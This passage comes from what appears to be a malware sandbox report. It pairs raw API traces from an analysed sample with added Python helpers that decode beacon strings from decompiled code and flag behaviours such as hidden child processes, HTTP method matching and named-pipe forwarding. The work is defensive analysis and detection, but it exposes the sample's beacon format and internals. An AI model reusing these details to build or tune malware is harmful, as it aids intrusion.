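Added example for this page, not part of the sample or of the report."""
from __future__ import annotations

import re
import struct
from typing import List, Optional, Tuple

# Constructed excerpt of the listing above (comments copied from it).
LISTING = """
_t64 =  *0xdda018; // 0x7b557b46
_t65 =  *0xdda014; // 0x5cb11ae7
_t66 =  *0xdda010; // 0x15dc9586
_t67 =  *0xdda00c; // 0x67522d90
_t68 =  *0xdda2d4; // 0x2bed5a8
_t3 = _t68 + 0xddb622; // 0x74666f73
_t4 = _t72 + 0xddb662; // 0x74707526
_t8 = _t139 + 0xddb66d; // 0x732526
_t10 = _t77 + 0xddb38a; // 0x6d697426
_t12 = _t81 + 0xddb7b4; // 0x39c8d5c
_t14 = _t81 + 0xddb33b; // 0x74636126
_t18 = _t135 + 0xddb8e9; // 0x3d736f26
_t20 = _t132 + 0xddb685; // 0x73797326
"""

COMMENT_RE = re.compile(r"//\s*0x([0-9a-fA-F]{1,8})\b")


def dword_to_ascii(value: int) -> Optional[str]:
    """Return the text a 32-bit immediate spells when stored little-endian,
    or None if any byte before the trailing NULs is not printable ASCII.
    A 3-byte value such as 0x732526 decodes to '&%s' plus its terminator."""
    raw = struct.pack("<I", value & 0xFFFFFFFF).rstrip(b"\x00")
    if not raw or not all(0x20 <= b < 0x7F for b in raw):
        return None
    return raw.decode("ascii")


def ascii_immediates(listing: str) -> List[Tuple[int, str]]:
    """Collect every commented immediate that decodes to printable ASCII.
    Pointers (0x2bed5a8, 0x39c8d5c) are rejected. Data words can pass the
    filter by accident: 0x7b557b46 is 'F{U{', the 'String ID' the report
    lists for this function, although it is an id word rather than text."""
    found = []
    for m in COMMENT_RE.finditer(listing):
        value = int(m.group(1), 16)
        text = dword_to_ascii(value)
        if text is not None:
            found.append((value, text))
    return found


def bswap32(value: int) -> int:
    """The `asm("bswap eax")` step: reverse the byte order of one dword."""
    return int.from_bytes(struct.pack("<I", value), "big")


def hex_after_bswap(words: List[int]) -> str:
    """Render each word as wsprintfA would after the bswap, assuming an
    8-digit hex specifier (an assumption: the page shows only the first
    four bytes of the format string)."""
    return "".join(f"{bswap32(w):08x}" for w in words)


def raw_bytes_hex(words_by_address: List[int]) -> str:
    """Hex of the same 16 bytes in the order they sit in memory."""
    return b"".join(struct.pack("<I", w) for w in words_by_address).hex()


# wsprintfA is called with _t67, _t66, _t65, _t64, i.e. the words in
# ascending address order: 0xdda00c, 0xdda010, 0xdda014, 0xdda018.
ID_WORDS = [0x67522D90, 0x15DC9586, 0x5CB11AE7, 0x7B557B46]

if __name__ == "__main__":
    for value, text in ascii_immediates(LISTING):
        print(f"0x{value:08x} -> {text!r}")
    print("bswap + %08x :", hex_after_bswap(ID_WORDS))
    print("memory bytes :", raw_bytes_hex(ID_WORDS))
```

The last two outputs are identical: bswapping each dword and printing it as eight hex digits, in ascending address order, is just a way of emitting the 16 bytes at 0xdda00c exactly as they lie in memory, so the id field in the beacon can be matched against the raw bytes of the config without any further byte reordering. When applying the same decoding to other functions in this report, treat every hit as a candidate only; a word of real data that happens to be printable (like "F{U{" here) looks no different to the filter than a string fragment.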
                                                            Address column for the listing above (one instruction address per source line, shown here as a side column that extraction spilled into separate lines): the function occupies 0x00dd323c to 0x00dd3560; entries of 0x00000000 belong to lines that emit no instruction.

                                                            APIs
                                                            • GetTickCount.KERNEL32 ref: 00DD3253
                                                            • wsprintfA.USER32 ref: 00DD32A0
                                                            • wsprintfA.USER32 ref: 00DD32BD
                                                            • wsprintfA.USER32 ref: 00DD32DD
                                                            • wsprintfA.USER32 ref: 00DD32FB
                                                            • wsprintfA.USER32 ref: 00DD331E
                                                            • wsprintfA.USER32 ref: 00DD333F
                                                            • wsprintfA.USER32 ref: 00DD335F
                                                            • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00DD3390
                                                            • GetTickCount.KERNEL32 ref: 00DD33A1
                                                            • RtlEnterCriticalSection.NTDLL(039C95F0), ref: 00DD33B5
                                                            • RtlLeaveCriticalSection.NTDLL(039C95F0), ref: 00DD33D3
                                                              • Part of subcall function 00DD637D: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,00000000,00DD72E3,00000000,039C9630), ref: 00DD63A8
                                                              • Part of subcall function 00DD637D: lstrlen.KERNEL32(00000000,?,00000000,00DD72E3,00000000,039C9630), ref: 00DD63B0
                                                              • Part of subcall function 00DD637D: strcpy.NTDLL ref: 00DD63C7
                                                              • Part of subcall function 00DD637D: lstrcat.KERNEL32(00000000,00000000), ref: 00DD63D2
                                                              • Part of subcall function 00DD637D: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,00DD72E3,?,00000000,00DD72E3,00000000,039C9630), ref: 00DD63EF
                                                            • StrTrimA.SHLWAPI(00000000,00DD92AC,?,039C9630), ref: 00DD3408
                                                              • Part of subcall function 00DD7067: lstrlen.KERNEL32(039C887A,00000000,00000000,00000000,00DD730A,00000000), ref: 00DD7077
                                                              • Part of subcall function 00DD7067: lstrlen.KERNEL32(?), ref: 00DD707F
                                                              • Part of subcall function 00DD7067: lstrcpy.KERNEL32(00000000,039C887A), ref: 00DD7093
                                                              • Part of subcall function 00DD7067: lstrcat.KERNEL32(00000000,?), ref: 00DD709E
                                                            • lstrcpy.KERNEL32(00000000,?), ref: 00DD3428
                                                            • lstrcat.KERNEL32(00000000,?), ref: 00DD343A
                                                            • lstrcat.KERNEL32(00000000,00000000), ref: 00DD3440
                                                              • Part of subcall function 00DD5691: lstrlen.KERNEL32(?,00000000,039C9D00,745EC740,00DD291A,039C9F05,00DD5FB9,00DD5FB9,?,00DD5FB9,?,69B25F44,E8FA7DD7,00000000), ref: 00DD5698
                                                              • Part of subcall function 00DD5691: mbstowcs.NTDLL ref: 00DD56C1
                                                              • Part of subcall function 00DD5691: memset.NTDLL ref: 00DD56D3
                                                            • wcstombs.NTDLL ref: 00DD34D1
                                                              • Part of subcall function 00DD211F: SysAllocString.OLEAUT32(00000000), ref: 00DD2160
                                                              • Part of subcall function 00DD77EC: RtlFreeHeap.NTDLL(00000000,00000000,00DD1333,00000000,00000000,?,00000000,?,?,?,?,?,00DD66B0,00000000,?,00000001), ref: 00DD77F8
                                                            • HeapFree.KERNEL32(00000000,?,00000000), ref: 00DD3512
                                                            • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00DD3522
                                                            • HeapFree.KERNEL32(00000000,00000000,?,039C9630), ref: 00DD3532
                                                            • HeapFree.KERNEL32(00000000,?), ref: 00DD3542
                                                            • HeapFree.KERNEL32(00000000,?), ref: 00DD3550
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: Heapwsprintf$Free$lstrlen$lstrcat$CountCriticalSectionTickTrimlstrcpy$AllocAllocateEnterLeaveStringmbstowcsmemsetstrcpywcstombs
                                                            • String ID: F{U{
                                                            • API String ID: 972889839-3347341033
                                                            • Opcode ID: c1fbd49f6bc6814eb6b84f7788eed741867e7b2dbcde408bb4ba09557e7c5493
                                                            • Instruction ID: 25f5d540ecec94c8a996da7df091dfa8a738f4b22531cca9465d81631be3fa17
                                                            • Opcode Fuzzy Hash: c1fbd49f6bc6814eb6b84f7788eed741867e7b2dbcde408bb4ba09557e7c5493
                                                            • Instruction Fuzzy Hash: 86A15D71501209AFCB11DFA8EC89EAA3BA9FF48314B158067F809C7360D736DA10DBB1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • lstrlen.KERNEL32(?,?,0458C140), ref: 04573B03
                                                            • RtlAllocateHeap.NTDLL(00000000,0458BAA9,?), ref: 04573B9F
                                                            • lstrcpyn.KERNEL32(00000000,?,0458BAA9,?,0458C140), ref: 04573BB4
                                                            • HeapFree.KERNEL32(00000000,00000000,00000000,?,0458C140), ref: 04573BCF
                                                            • StrChrA.SHLWAPI(?,00000020,?,00000000,00000000,?,00000000,?,0458BAA8,?,?,0458C140), ref: 04573CB9
                                                            • StrChrA.SHLWAPI(00000001,00000020,?,0458C140), ref: 04573CCA
                                                            • lstrlen.KERNEL32(00000000,?,0458C140), ref: 04573CDE
                                                            • memmove.NTDLL(0458BAA9,?,00000001,?,0458C140), ref: 04573CEE
                                                            • lstrlen.KERNEL32(?,?,00000000,00000000,?,00000000,?,0458BAA8,?,?,0458C140), ref: 04573D1A
                                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 04573D40
                                                            • memcpy.NTDLL(00000000,?,?,?,0458C140), ref: 04573D54
                                                            • memcpy.NTDLL(0458BAA8,?,?,?,0458C140), ref: 04573D74
                                                            • HeapFree.KERNEL32(00000000,0458BAA8,?,?,?,?,?,?,?,?,0458C140), ref: 04573DB0
                                                            • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 04573E76
                                                            • HeapFree.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,00000001), ref: 04573EBE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Heap$AllocateFreelstrlen$memcpy$lstrcpynmemmove
                                                            • String ID: GET $GET $OPTI$OPTI$POST$PUT
                                                            • API String ID: 3227826163-647159250
                                                            • Opcode ID: 744338615e55d941ea665e179d9a7be7a19a78656bf93b9a115699c3956e669c
                                                            • Instruction ID: 83e015e05f9147a6ba99179db7be2304c536cdff6c4c1a9ecc477bfc44926324
                                                            • Opcode Fuzzy Hash: 744338615e55d941ea665e179d9a7be7a19a78656bf93b9a115699c3956e669c
                                                            • Instruction Fuzzy Hash: 0AE15971A00206EFDB14DFA9E884AAA7BB8FF04314F148568F915EB291DB34E954FB50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • lstrlenW.KERNEL32(?), ref: 04561015
                                                              • Part of subcall function 04580BC5: lstrlenW.KERNEL32(?,?,00000000,?,00000250,?,00000000), ref: 04580C11
                                                              • Part of subcall function 04580BC5: lstrlenW.KERNEL32(?,?,00000000,?,00000250,?,00000000), ref: 04580C1D
                                                              • Part of subcall function 04580BC5: memset.NTDLL ref: 04580C65
                                                              • Part of subcall function 04580BC5: FindFirstFileW.KERNEL32(00000000,00000000), ref: 04580C80
                                                              • Part of subcall function 04580BC5: lstrlenW.KERNEL32(0000002C), ref: 04580CB8
                                                              • Part of subcall function 04580BC5: lstrlenW.KERNEL32(?), ref: 04580CC0
                                                              • Part of subcall function 04580BC5: memset.NTDLL ref: 04580CE3
                                                              • Part of subcall function 04580BC5: wcscpy.NTDLL ref: 04580CF5
                                                              • Part of subcall function 04580BC5: PathFindFileNameW.SHLWAPI(0000001C,?,?,?,?,00000000), ref: 04580D1B
                                                              • Part of subcall function 04580BC5: RtlEnterCriticalSection.NTDLL(?), ref: 04580D50
                                                              • Part of subcall function 04580BC5: RtlLeaveCriticalSection.NTDLL(?), ref: 04580D6C
                                                              • Part of subcall function 04580BC5: FindNextFileW.KERNEL32(?,00000000), ref: 04580D85
                                                              • Part of subcall function 04580BC5: WaitForSingleObject.KERNEL32(00000000), ref: 04580D97
                                                              • Part of subcall function 04580BC5: FindClose.KERNEL32(?), ref: 04580DAC
                                                              • Part of subcall function 04580BC5: FindFirstFileW.KERNEL32(00000000,00000000), ref: 04580DC0
                                                              • Part of subcall function 04580BC5: lstrlenW.KERNEL32(0000002C), ref: 04580DE2
                                                            • RtlAllocateHeap.NTDLL(00000000,00000036,?), ref: 04561071
                                                            • memcpy.NTDLL(00000000,?,00000000), ref: 04561084
                                                            • lstrcpyW.KERNEL32(00000000,?), ref: 0456109B
                                                              • Part of subcall function 04580BC5: FindNextFileW.KERNEL32(?,00000000), ref: 04580E58
                                                              • Part of subcall function 04580BC5: WaitForSingleObject.KERNEL32(00000000), ref: 04580E6A
                                                              • Part of subcall function 04580BC5: FindClose.KERNEL32(?), ref: 04580E85
                                                            • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000,00000010), ref: 045610C6
                                                            • RtlAllocateHeap.NTDLL(00000000,0000020C), ref: 045610DE
                                                            • HeapFree.KERNEL32(00000000,00000000), ref: 04561138
                                                            • lstrlenW.KERNEL32(00000000,?), ref: 0456115B
                                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 0456116D
                                                            • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000,00000014), ref: 045611E1
                                                            • HeapFree.KERNEL32(00000000,?), ref: 045611F1
                                                              • Part of subcall function 04574B63: lstrlen.KERNEL32(?,770F4620,00000000,?,00000000,04561211,?), ref: 04574B72
                                                              • Part of subcall function 04574B63: mbstowcs.NTDLL ref: 04574B8E
                                                            • CreateDirectoryW.KERNEL32(00000000,00000000,?), ref: 0456121A
                                                            • lstrlenW.KERNEL32(0458D8B0,?), ref: 04561294
                                                            • DeleteFileW.KERNEL32(?,?), ref: 045612C2
                                                            • HeapFree.KERNEL32(00000000,?), ref: 045612D0
                                                            • HeapFree.KERNEL32(00000000,?), ref: 045612F1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Heaplstrlen$Find$FileFree$Allocate$CloseCriticalFirstNextObjectSectionSingleWaitmemset$CreateDeleteDirectoryEnterLeaveNamePathlstrcpymbstowcsmemcpywcscpy
                                                            • String ID:
                                                            • API String ID: 72361108-0
                                                            • Opcode ID: 92eef9b0fd4137b53472eca777afc7be762558d73f8764e56976971f3042fd13
                                                            • Instruction ID: 5495aff360cc2efa58983b67c9283f72093dda764eb4bf2c3cd5b2e5ab9a172f
                                                            • Opcode Fuzzy Hash: 92eef9b0fd4137b53472eca777afc7be762558d73f8764e56976971f3042fd13
                                                            • Instruction Fuzzy Hash: 9B915D7190021AEFDB10DFA5ECC8DAE7BBCFB49354B045419F505E7292DA38A948EF60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 04576504
                                                            • RtlEnterCriticalSection.NTDLL(00000000), ref: 04576521
                                                            • CloseHandle.KERNEL32(?,?,?,?,00000000), ref: 04576571
                                                            • DeleteFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0457657B
                                                            • GetLastError.KERNEL32 ref: 04576585
                                                            • HeapFree.KERNEL32(00000000,00000000), ref: 04576596
                                                            • HeapFree.KERNEL32(00000000,?,?,?,?,00000000), ref: 045765B8
                                                            • HeapFree.KERNEL32(00000000,?), ref: 045765EF
                                                            • RtlLeaveCriticalSection.NTDLL(00000000), ref: 04576603
                                                            • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0457660C
                                                            • SuspendThread.KERNEL32(?), ref: 0457661B
                                                            • CreateEventA.KERNEL32(0458C1A8,00000001,00000000), ref: 0457662F
                                                            • SetEvent.KERNEL32(00000000), ref: 0457663C
                                                            • CloseHandle.KERNEL32(00000000), ref: 04576643
                                                            • Sleep.KERNEL32(000001F4), ref: 04576656
                                                            • ResumeThread.KERNEL32(?), ref: 0457667A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: CloseFreeHeap$CriticalEventHandleSectionThread$CreateDeleteEnterErrorFileLastLeaveOpenResumeSleepSuspend
                                                            • String ID:
                                                            • API String ID: 1011176505-0
                                                            • Opcode ID: c5ac4b41cb2385b31ee6c313ed130535f3086649f6aea69a31edc636768d8446
                                                            • Instruction ID: 12acd6ef381347fcc5587b8edfbbc97cbca58197e538b524bff2cdb8b3b5739d
                                                            • Opcode Fuzzy Hash: c5ac4b41cb2385b31ee6c313ed130535f3086649f6aea69a31edc636768d8446
                                                            • Instruction Fuzzy Hash: AA414BB2900506EFDB119FA4FC889ADBBB9FB04355B50517DF602B2110DB39AE58FB60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 04583C35: RtlAllocateHeap.NTDLL(00000000,?,04580BE2), ref: 04583C41
                                                            • memset.NTDLL ref: 04571B20
                                                            • StrChrA.SHLWAPI(?,0000000D), ref: 04571B66
                                                            • StrChrA.SHLWAPI(?,0000000A), ref: 04571B73
                                                            • StrChrA.SHLWAPI(?,0000007C), ref: 04571B9A
                                                            • StrTrimA.SHLWAPI(?,0458847C), ref: 04571BAF
                                                            • StrChrA.SHLWAPI(?,0000003D), ref: 04571BB8
                                                            • StrTrimA.SHLWAPI(00000001,0458847C), ref: 04571BCE
                                                            • _strupr.NTDLL ref: 04571BD5
                                                            • StrTrimA.SHLWAPI(?,?), ref: 04571BE2
                                                            • memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 04571C2A
                                                            • lstrlen.KERNEL32(?,00000000,?,?,?,00000001,?,00000000,045863D8,00000002,?,?), ref: 04571C49
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Trim$AllocateHeap_struprlstrlenmemcpymemset
                                                            • String ID: $;
                                                            • API String ID: 4019332941-73438061
                                                            • Opcode ID: 99bf14a739c0c007ecd77e91b18f4c70a717ee06374be36b62916c2fdc8144d0
                                                            • Instruction ID: 7caa2e8476433a9021c7907023d8bd8db74ebe5cac48a4447a688003f00076b5
                                                            • Opcode Fuzzy Hash: 99bf14a739c0c007ecd77e91b18f4c70a717ee06374be36b62916c2fdc8144d0
                                                            • Instruction Fuzzy Hash: 2D41C0711047069FD711EF69A844B2ABBECFF58704F08082DF995AB241EF74F9059B62
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • memset.NTDLL ref: 0457A98B
                                                              • Part of subcall function 04574B63: lstrlen.KERNEL32(?,770F4620,00000000,?,00000000,04561211,?), ref: 04574B72
                                                              • Part of subcall function 04574B63: mbstowcs.NTDLL ref: 04574B8E
                                                            • lstrlenW.KERNEL32(00000000,00000000,00000000,?,00000000,?), ref: 0457A9C4
                                                            • wcstombs.NTDLL ref: 0457A9CE
                                                            • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,?,00000000,?), ref: 0457A9FF
                                                            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,04581B1D), ref: 0457AA2B
                                                            • TerminateProcess.KERNEL32(?,000003E5), ref: 0457AA41
                                                            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,04581B1D), ref: 0457AA55
                                                            • GetLastError.KERNEL32 ref: 0457AA59
                                                            • GetExitCodeProcess.KERNEL32(?,00000001), ref: 0457AA79
                                                            • CloseHandle.KERNEL32(?), ref: 0457AA88
                                                            • CloseHandle.KERNEL32(?), ref: 0457AA8D
                                                            • GetLastError.KERNEL32 ref: 0457AA91
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Process$CloseErrorHandleLastMultipleObjectsWaitlstrlen$CodeCreateExitTerminatembstowcsmemsetwcstombs
                                                            • String ID: D
                                                            • API String ID: 2463014471-2746444292
                                                            • Opcode ID: 7d4c0dacbf4c66b2175fb1c8be2bdd19a2eac8700b0d9221901a6d38d370ae22
                                                            • Instruction ID: b8a67f3f17ad72d3416ef41dee979f32605dd490819eab11ec7c1434c4e3b84a
                                                            • Opcode Fuzzy Hash: 7d4c0dacbf4c66b2175fb1c8be2bdd19a2eac8700b0d9221901a6d38d370ae22
                                                            • Instruction Fuzzy Hash: 70413B72D00119FFDF11EFA4ED859AEBBBCFB48344F10407AE501B2101EA356E04AB61
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%
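The entries above are raw per-function API traces, and two of them are worth reading by hand: the function at 0457A9FF calls CreateProcessA with dwCreationFlags 0C000000 (CREATE_DEFAULT_ERROR_MODE | CREATE_NO_WINDOW, a console-less child), waits on two handles, and terminates the child with exit code 3E5; the function at 04573B03 carries the string ID "GET $GET $OPTI$OPTI$POST$PUT", i.e. it compares a request line against 4-byte HTTP method prefixes. The following parser and heuristics are an added example written for this page, not code from the Joe Sandbox report or from the sample; the sample trace lines embedded below are copied from the entries above (constructed test input), the flag table holds the documented Win32 dwCreationFlags bits, and the finding strings and thresholds (the 3-character minimum for method tokens, which keeps the single-character string ID "D" from matching DELETE) are my own choices.

```python
"""Parse Joe Sandbox per-function 'APIs' entries and derive a few behavioural
findings from them (added example; not part of the Joe Sandbox report)."""
import re
from dataclasses import dataclass
from typing import List, Optional

# One trace line: optional "Part of subcall function XXXX:" prefix, then
# Api.MODULE(args), ref: address.  The argument list may be absent entirely.
API_RE = re.compile(
    r"•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

# Documented CreateProcess dwCreationFlags bits (winbase.h).
CREATION_FLAGS = {
    0x00000004: "CREATE_SUSPENDED",
    0x00000008: "DETACHED_PROCESS",
    0x00000010: "CREATE_NEW_CONSOLE",
    0x00000200: "CREATE_NEW_PROCESS_GROUP",
    0x04000000: "CREATE_DEFAULT_ERROR_MODE",
    0x08000000: "CREATE_NO_WINDOW",
}

HTTP_METHODS = ("GET", "POST", "PUT", "OPTIONS", "HEAD", "DELETE")

# Trace lines copied from the report entry at 0457A9FF (constructed test input).
SAMPLE_RUNNER = """
• memset.NTDLL ref: 0457A98B
  • Part of subcall function 04574B63: lstrlen.KERNEL32(?,770F4620,00000000,?,00000000,04561211,?), ref: 04574B72
• CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,?,00000000,?), ref: 0457A9FF
• WaitForMultipleObjects.KERNEL32(00000002,?,00000000,04581B1D), ref: 0457AA2B
• TerminateProcess.KERNEL32(?,000003E5), ref: 0457AA41
• GetExitCodeProcess.KERNEL32(?,00000001), ref: 0457AA79
• CloseHandle.KERNEL32(?), ref: 0457AA88
"""
# String ID of the report entry at 04573B03.
SAMPLE_HTTP_STRING_ID = "GET $GET $OPTI$OPTI$POST$PUT"


@dataclass
class Call:
    api: str
    module: str
    args: List[str]          # hex strings, or '?' where the tracer lost the value
    ref: int                 # address of the call site
    subcall: Optional[str]   # set when the line belongs to a called subfunction


def parse_entry(text: str) -> List[Call]:
    """Turn the lines of one 'APIs' block into Call records."""
    calls = []
    for line in text.splitlines():
        m = API_RE.search(line)
        if not m:
            continue
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw else []
        calls.append(Call(m.group("api"), m.group("mod"), args,
                          int(m.group("ref"), 16), m.group("sub")))
    return calls


def decode_flags(value: int, table: dict) -> List[str]:
    """Expand a bitmask into flag names; bits not in the table are reported as hex."""
    names = [name for bit, name in sorted(table.items()) if value & bit]
    unknown = value & ~sum(table)
    if unknown:
        names.append(hex(unknown))
    return names


def assess(calls: List[Call], string_id: str = "") -> List[str]:
    """Apply a few heuristics to one function's trace and return the findings."""
    findings = []
    direct = [c for c in calls if c.subcall is None]
    names = {c.api for c in direct}
    for c in direct:
        # dwCreationFlags is the 6th parameter of CreateProcessA/W.
        if c.api.startswith("CreateProcess") and len(c.args) > 5 and c.args[5] != "?":
            flags = decode_flags(int(c.args[5], 16), CREATION_FLAGS)
            findings.append(f"CreateProcess@{c.ref:08X} flags={'|'.join(flags)}")
            if "CREATE_NO_WINDOW" in flags:
                findings.append("child process started without a console window")
    if names & {"CreateProcessA", "CreateProcessW"} and "TerminateProcess" in names \
            and names & {"WaitForSingleObject", "WaitForMultipleObjects"}:
        findings.append("spawns a child, waits with a timeout, then kills it")
    # String IDs are '$'-separated; the hook compares 4-byte method prefixes,
    # so accept any token of at least 3 characters that prefixes a method name.
    tokens = {t.strip() for t in string_id.split("$") if t.strip()}
    if any(len(t) >= 3 and any(m.startswith(t) for m in HTTP_METHODS) for t in tokens):
        findings.append("compares request line against HTTP method names")
    all_names = {c.api for c in calls}   # subcalls count here: the pipe write may be nested
    if "CallNamedPipeA" in all_names and {"RegQueryValueExA", "RegQueryValueExW"} & all_names:
        findings.append("reads a registry value and forwards data over a named pipe")
    return findings


if __name__ == "__main__":
    for finding in assess(parse_entry(SAMPLE_RUNNER), "D"):
        print(finding)
    print(assess([], SAMPLE_HTTP_STRING_ID))
```

The regex deliberately tolerates lines without an argument list (memset.NTDLL ref: ...) and the deeper-indented "Part of subcall function" lines, so a whole APIs block can be pasted in unchanged; subcall lines are kept but excluded from the process-spawn rule, since the API ID summary of an entry is built from the function's own calls, while the named-pipe rule includes them because the report shows CallNamedPipeA only inside subcall 0456A6F7.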

                                                            APIs
                                                              • Part of subcall function 045768B2: RegQueryValueExA.KERNELBASE(00000000,04575AB0,00000000,04575AB0,00000000,?,00000000,00000000,00000000,00000001,73B74D40,04575AB0,04575AB0,?,045674AD,?), ref: 045768EA
                                                              • Part of subcall function 045768B2: RtlAllocateHeap.NTDLL(00000000,?), ref: 045768FE
                                                              • Part of subcall function 045768B2: RegQueryValueExA.ADVAPI32(00000000,04575AB0,00000000,04575AB0,00000000,?,?,045674AD,?,04575AB0,00000000,00000001,00000000,73B74D40), ref: 04576918
                                                              • Part of subcall function 045768B2: RegCloseKey.ADVAPI32(00000000,?,045674AD,?,04575AB0,00000000,00000001,00000000,73B74D40,?,?,?,04575AB0,00000000), ref: 04576942
                                                            • HeapFree.KERNEL32(00000000,?,?,?,?,73BCF710,00000000,00000000), ref: 045834FA
                                                            • RtlAllocateHeap.NTDLL(00000000,00010000,?), ref: 04583518
                                                            • HeapFree.KERNEL32(00000000,00000000,00000029,00000000,00000000,?,?,?,?,?,?,04572FCF), ref: 04583546
                                                            • HeapFree.KERNEL32(00000000,045863D8,0000002A,00000000,00000000,00000000,00000000,?,00000001,045863D8,00000002,?,?), ref: 045835BA
                                                            • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 0458367D
                                                            • wsprintfA.USER32 ref: 04583698
                                                            • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,04572FCF), ref: 045836A3
                                                            • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000,?,?,?,?,?,?,?,?,?,04572FCF), ref: 045836BA
                                                            • HeapFree.KERNEL32(00000000,?,?,?,00000008,0000000B,?,?,?,00000001,00000000,?,00000001,045863D8,00000002,?), ref: 045836DC
                                                            • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 045836F7
                                                            • wsprintfA.USER32 ref: 0458370E
                                                            • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,04572FCF), ref: 04583719
                                                              • Part of subcall function 0456A6F7: lstrlen.KERNEL32(045647C4,00000000,00000000,?,?,?,045647C4,00000035,00000000,-00000005,00000000), ref: 0456A727
                                                              • Part of subcall function 0456A6F7: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 0456A73D
                                                              • Part of subcall function 0456A6F7: memcpy.NTDLL(00000010,045647C4,00000000,?,?,045647C4,00000035,00000000), ref: 0456A773
                                                              • Part of subcall function 0456A6F7: memcpy.NTDLL(00000010,00000000,00000035,?,?,045647C4,00000035), ref: 0456A78E
                                                              • Part of subcall function 0456A6F7: CallNamedPipeA.KERNEL32(00000000,00000000,?,00000010,00000028,00000001), ref: 0456A7AC
                                                              • Part of subcall function 0456A6F7: GetLastError.KERNEL32(?,?,045647C4,00000035), ref: 0456A7B6
                                                              • Part of subcall function 0456A6F7: HeapFree.KERNEL32(00000000,00000000,?,?,045647C4,00000035), ref: 0456A7D9
                                                            • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000,?,?,?,?,?,?,?,?,?,04572FCF), ref: 04583730
                                                            • HeapFree.KERNEL32(00000000,?,?,00000001,00000000,?,00000001,045863D8,00000002,?,?), ref: 04583740
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Heap$Free$Allocate$lstrlen$QueryValuememcpywsprintf$CallCloseErrorLastNamedPipe
                                                            • String ID:
                                                            • API String ID: 3733591251-0
                                                            • Opcode ID: da6d53960b3f3a74067ffe97c75281768aeba23315356fe6e92e76f606464f70
                                                            • Instruction ID: 470df7b3783f0b7559dcc45144ccc78d72f7fd89aefcaf3908d39eeb9eb3d0d7
                                                            • Opcode Fuzzy Hash: da6d53960b3f3a74067ffe97c75281768aeba23315356fe6e92e76f606464f70
                                                            • Instruction Fuzzy Hash: A4814CB1900216EFDB20AF95EC84DAEBBB9FB04744B00042DF911B7250DF36AE45EB64
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • StrChrA.SHLWAPI(?,0000002C), ref: 04567C1C
                                                            • StrTrimA.SHLWAPI(00000001,?), ref: 04567C35
                                                            • StrChrA.SHLWAPI(?,0000002C), ref: 04567C40
                                                            • StrTrimA.SHLWAPI(00000001,?), ref: 04567C59
                                                            • lstrlen.KERNEL32(?,?,00000001,?,?), ref: 04567CFC
